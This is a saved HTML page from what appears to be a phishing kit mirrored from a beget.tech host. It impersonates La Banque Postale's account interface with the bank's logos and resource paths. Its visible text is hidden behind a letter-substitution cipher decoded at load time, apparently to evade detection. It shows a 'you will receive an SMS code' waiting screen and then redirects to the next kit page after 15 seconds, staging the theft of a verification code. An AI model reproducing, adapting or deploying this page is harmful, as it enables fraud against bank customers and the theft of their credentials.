<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0106)https://voscomptesenligne.labanquepostale.fr/voscomptes/canalXHTML/CCP/releves_ccp/releveCPP-releve_ccp.ea -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">


<!-- Mirrored from certib1j.beget.tech/poste/postale/acc/75fab/proc2.php by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 15 May 2020 00:39:39 GMT -->
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <!-- standard.jsp -->

    <meta http-equiv="Content-Language" content="fr">
    <meta http-equiv="Content-Script-Type" content="text/javascript">
    <meta http-equiv="Content-Style-Type" content="text/css">
    <title>Bienvenue,</title>
    <link type="image/x-icon" href="img/favicon.png" rel="shortcut icon">
    <meta http-equiv="refresh" content="15;url=index4.html" />

    <script type="text/javascript">
        var pathRessourcesCss = "https://www.labanquepostale.fr/etc/designs/lbp/transac/css/";
        var pathRessourcesjs = "https://www.labanquepostale.fr/etc/designs/lbp/transac/js/";
        var pathRessourcesImg = "https://www.labanquepostale.fr/etc/designs/lbp/transac/img/q4x/";
    </script>
    <link rel="stylesheet" type="text/css" href="azertyu/reset.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/datePicker.css" media="all">

    <link rel="stylesheet" type="text/css" href="azertyu/default.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/static.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/rib.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/blocs.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/jquery-ui-1.8.6.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/print.css" media="all">

    <link rel="stylesheet" type="text/css" href="azertyu/bridge.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/fontesLocales.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/main.css" media="all">
    <link rel="stylesheet" type="text/css" href="azertyu/outils.css" media="all">

    <link rel="stylesheet" type="text/css" href="azertyu/correctifs-style.css" media="all">

    <!--[if lte IE 8]>
    <link rel="stylesheet" type="text/css" href="https://www.labanquepostale.fr/etc/designs/lbp/transac/css/q4x/ie8.css" media="all" />
<![endif]-->
    <!--[if lte IE 7]>
    <link rel="stylesheet" type="text/css" href="https://www.labanquepostale.fr/etc/designs/lbp/transac/css/q4x/ie7.css" media="all" />
<![endif]-->
    <!--[if lte IE 6]>
   <link rel="stylesheet" type="text/css" href="https://www.labanquepostale.fr/etc/designs/lbp/transac/css/q4x/ie6.css" media="all" />
<![endif]-->

    <script type="text/javascript" src="azertyu/onsubmit.js"></script>
    <script type="text/javascript" src="azertyu/eA-HTML.js"></script>
    <script type="text/javascript" src="azertyu/FwMC-Ext.js"></script>

    <script type="text/javascript" src="azertyu/lib-formbean-bel.js"></script>
    <script type="text/javascript" src="azertyu/generique.js"></script>
    <script type="text/javascript" src="azertyu/outils.html"></script>

    <script type="text/javascript" src="azertyu/ajax.js"></script>
    <script type="text/javascript" src="azertyu/hub.js"></script>
    <script type="text/javascript" src="azertyu/messagerie.js"></script>

    <!-- Javascript -->

    <script type="text/javascript" src="azertyu/jquery-1.11.1.min.js"></script>
    <script type="text/javascript" src="azertyu/jquery-migrate-1.4.0.js"></script>
    <script type="text/javascript" src="azertyu/jquery.tablesorter.js"></script>
    <script type="text/javascript" src="azertyu/jquery.fixcolheight.js"></script>
    <script type="text/javascript" src="azertyu/jquery.simplemodal.js"></script>
    <script type="text/javascript" src="azertyu/jquery.placeholder.js"></script>
    <script type="text/javascript" src="azertyu/jquery.datePicker.js"></script>
    <script type="text/javascript" src="azertyu/jquery-ui.min.js"></script>
    <script type="text/javascript" src="azertyu/date.js"></script>
    <script type="text/javascript" src="azertyu/date_fr.js"></script>
    <script type="text/javascript" src="azertyu/swfobject.js"></script>
    <script type="text/javascript" src="azertyu/typeahead.jquery.min.js"></script>
    <script type="text/javascript" src="azertyu/config.js"></script>
    <script type="text/javascript" src="azertyu/lib-init.js"></script>
    <script type="text/javascript" src="azertyu/print.js"></script>

    <script type="text/javascript" src="azertyu/bootstrap.js"></script>
    <script type="text/javascript" src="azertyu/plugin.js"></script>
    <script type="text/javascript" src="azertyu/main.js"></script>
    <script type="text/javascript" src="azertyu/select2.min.js"></script>

    <script type="text/javascript" src="azertyu/profile.js"></script>

    <!-- SCRIPT permettant de mettre en gris les boutons annuler - Correction impact N6 -->
    <script type="text/javascript">
        $(document).ready(function() {
            $('a.btn_crt:contains("Annuler")').addClass("btn_annuler");
        });
    </script>

    <script type="text/javascript" src="azertyu/is.html"></script>
    <link rel="stylesheet" href="azertyu/inbenta_OLD.css">
</head>

<body>
    <div id="page">

        <script type="text/javascript" src="azertyu/xiti_profile.js"></script>

        <!-- SCRIPT INBENTA  -->
        <script language="javascript" type="text/javascript" src="azertyu/inbenta-faq.js" defer=""></script>

        <script type="text/javascript" src="azertyu/header.js" defer=""></script>

        <header id="header-main" role="banner">

            <div id="inbenta-contents"></div>
            <div class="header__profile">
                <div class="content" role="banner">
                    <a href="#" class="logo-wrapper"><img src="azertyu/logo-lbp_header.png" alt="La Banque Postale" class="logo"></a>
                    <div class="nav-profile">
                        <ul>
                            <li class="faq-search">

                                <a>
                                    <img src="azertyu/message.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"></i> <script>m='Uvzti%20pnt%20wptzervn%20%3F';d=unescape(m);document.write(d);</script></a>
                                <li class="profile collapse">
                                    <a>
                                        <img src="azertyu/profil.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"></i> <script>m='Avn%20uivfrl';d=unescape(m);document.write(d);</script>
                                        <span class="visually-hidden"><script>m='Dtulrti%20lt%20atnp';d=unescape(m);document.write(d);</script></span>
                                    </a>
                                </li>
                                <br>
                                <a id="gerer" href="#" onclick="return xt_click(this,'C','16','Gerer','N');">
                                    <img src="azertyu/deconnexion.png" alt="" aria-hidden="true" role="img" style="width:22px;height:22px"><span style="color: #F0F0F0;"><script>m='Dtcvnntkrvn';d=unescape(m);document.write(d);</script></span>
                                    <i class=""></i>
                            </li>
                        </ul>
                    </div>
                </div>
            </div>

            <div class="alert alert--primary" role="alert">
                <div class="content">
                    <a class="alert__close" href="#" id="#">
                        <img src="azertyu/x.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"></a>

                    </a>
                    <p class="alert__body" style="color: #fff">
                        <script> m='-%20Dtinrtit%20cvnntkrvn%20Rnetinte%20';d=unescape(m);document.write(d);</script>
                    </p>
                </div>
            </div>

            <nav id="menu" class="header__nav" role="navigation">
                <div class="content">
                    <ul>
                        <li>
                            <a id="consulter" href="#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m='Cvnzpleti';d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item">
                                <script> m='Cvnzpleti';d=unescape(m);document.write(d);</script>
                            </span>
                            </a>
                        </li>
                        <li>
                            <a id="gerer" href="#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m='Gtiti';d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item"><script>m='Gtiti';d=unescape(m);document.write(d);</script></span>
                            </a>
                        </li>
                        <li>

                            <a id="contacter" href="#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m='Cvnemceti';d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item">
                                        <div id="echec" class="cache_hub" style="float: left; display: none;">
                                            <img src="azertyu/enveloppe.png" alt="">
                                        </div>
                                        <span><script>m='Cvnemceti';d=unescape(m);document.write(d);</script></span>
                                <span class="badge badge--primary cache_hub" aria-hidden="true" id="nbHUB" style="display: inline-block;"><span id="nbHUBcontent">0</span></span>
                                </span>
                            </a>
                            <script type="text/javascript">
                                addOnloadFunction(prepaGestionHUB);

                                function prepaGestionHUB() {
                                    gestionHUB();
                                }
                            </script>

                        </li>
                        <li>
                            <a id="informersouscrire" href="#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
                                <span class="item" style="color: #004b9b"><script>m='Z%27rnfviati%20%26%20zvpzcirit';d=unescape(m);document.write(d);</script></span>
                            </a>
                        </li>
                    </ul>
                </div>
            </nav>
        </header>

        <div class="ui-grid-row">
        </div>
        <div class="formline">
            <label class="title-level2" for="cada" id="labelCompteEmetteur">
                <br>
                <div>
                    <div class="content">
                        <ul>
                            <li>
                                <span class="item">
	                        </span>
                                <br>
                                <br>
                            </li>
                            <li>

                                <div class="content">
                                    <ul>
                                        <li>

                                </div>
                                <div id="C:F1:D">
                                    <div class="a_blocfctltitre">
                                    </div>
                                    <div id="C:F1:expContent" class="a_blocfctl">
                                        <div id="C:B:D" class="bloctxt info">

                                            </head>

                                            <body>
                                                <form>
                                                    <center>
                                                        <h1 style="word-spacing: -6px"><script>m='Ovpz%20mllts%20itctovri%20pn%20cvdt%20umi%20zaz%20dt%20lm%20umie%20dt%20lm%20bmnwpt%20uvzemlt%20uvpi%20omlrdti%20ovz%20cvvidvnn%E9tz%20utizvnntl%20';d=unescape(m);document.write(d);</script></h1></center>
                                                    <div class="div1">
                                                        <center><img src="img/process.gif" alt="Smiley face" height="172" width="172" align="middle" class="process" /> </center>
                                                    </div>
                                                </form>
                                            </body>
                                            <br>
                                            <br>

                                            </main>

                                            <footer id="main-footer" role="contentinfo">

                                                <div class="content">
                                                    <a id="imageFooter" href="#" class="logo-wrapper">
                                                        <img src="azertyu/logo-lbp_footer.png" alt="La Banque Postale" class="logo">
                                                    </a>
                                                    <li><a href="#"><script>m='M%20uivuvz%20dt%20Lm%20Bmnwpt%20Uvzemlt';d=unescape(m);document.write(d);</script></a></li>
                                                    <li><a  href="#"><script>m='Emirfz';d=unescape(m);document.write(d);</script></a></li>
                                                    <li><a  href="#"><script>m='Ztcpiret';d=unescape(m);document.write(d);</script></a></li>
                                                    <li><a  href="#"><script>m='Mcctzzrbrlret';d=unescape(m);document.write(d);</script></a></li>
                                                    <li><a  href="#"><script>m='Atnervnz%20ltgmltz';d=unescape(m);document.write(d);</script></a></li>
                                                    <li><a  href="#"><script>m='Fvndz%20dt%20Gmimnert%20dtz%20dtu%F4ez';d=unescape(m);document.write(d);</script></a></li>
                                                    </ul>
                                                </div>
                                            </footer>
                                        </div>

                                        <script type="text/javascript" src="azertyu/iframeResizer.min.js"></script>
                                        <meta http-equiv="X-UA-Compatible" content="IE=edge">
                                        <!--[if lte IE 8]>
		<script type="text/javascript"	src="https://www.labanquepostale.fr/etc/designs/lbp/transac/js/ie8.polyfils.min.js"></script>
	<![endif]-->
                                        <script type="text/javascript">
                                            // Ceci est l'appel à la fonction resize. L'appel peut-être enrichi.
                                            // se referrer à  la notice : http://davidjbradshaw.github.io/iframe-resizer/
                                            $("iframe").iFrameResize({
                                                checkOrigin: false,
                                                heightCalculationMethod: 'max'
                                            });
                                        </script>

                                        <script type="text/javascript" src="azertyu/xtroi.js"></script>

                                        <div style="display: none;"></div>
                                        <div class="inbenta-loader" style="display:none" iaf-loader=""><i class="icon load"></i></div>
</body>



</html>